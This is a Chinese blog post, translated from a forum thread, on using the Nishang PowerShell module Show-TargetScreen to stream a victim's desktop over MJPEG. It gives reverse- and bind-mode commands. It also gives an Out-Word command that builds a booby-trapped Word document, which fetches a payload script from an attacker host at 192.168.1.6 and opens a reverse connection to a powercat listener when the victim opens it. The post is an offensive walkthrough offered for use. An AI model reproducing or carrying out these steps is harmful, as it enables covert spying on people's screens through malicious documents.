使用小段的powershell代码即可获取目标的实时桌面情况。Show-TargetScreen是nishang里面的一个模块。
项目地址:
https://github.com/samratashok/nishang
此脚本使用MJPEG实时性获取目标的桌面。使用-reverse参数可以连接到标准的netcat的监听一个端口上。一个nc也可以连接到这个脚本绑定的特定端口。
使用支持MJPEG一个浏览器(比如Firefox)打开本地端口来查看远程桌面。
要连接到的IP地址使用-reverse参数。
-bind是绑定的端口
PS > Show-TargetScreen -Reverse -IPAddress 192.168.1.1 -Port 443
以上是一个反向链接的例子,nc或powercat监听的必须是给定的IP地址和端口。
PS > Out-Word -PayloadURL"http://192.168.1.6/Show-TargetScreen.ps1" -Arguments"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"
以上是一个客户端脚本攻击的例子。
PS > Show-TargetScreen -Bind -Port 1234
以上是一个绑定模式的例子,使用火狐打开给定的IP地址、端口可查看桌面。
代码就不贴了,上面有项目地址,各位看官直接访问即可。
使用powercat来监听Show-TargetScreen连接的端口,还要指定我们要在火狐上打开的端口。
PS C:nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"
现在生成了doc文件,一旦用户打开,将会在powercat上反弹一个连接。
现在用火狐打开http://127.0.0.1:9000就可以看到桌面了。
from:https://rstforums.com/forum/108161-stream-targets-desktop-using-mjpeg-powershell.rst
小歪译,转载请注明。
本文始发于微信公众号(关注安全技术):使用MJPEG和Powershell获取目标的桌面截图
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论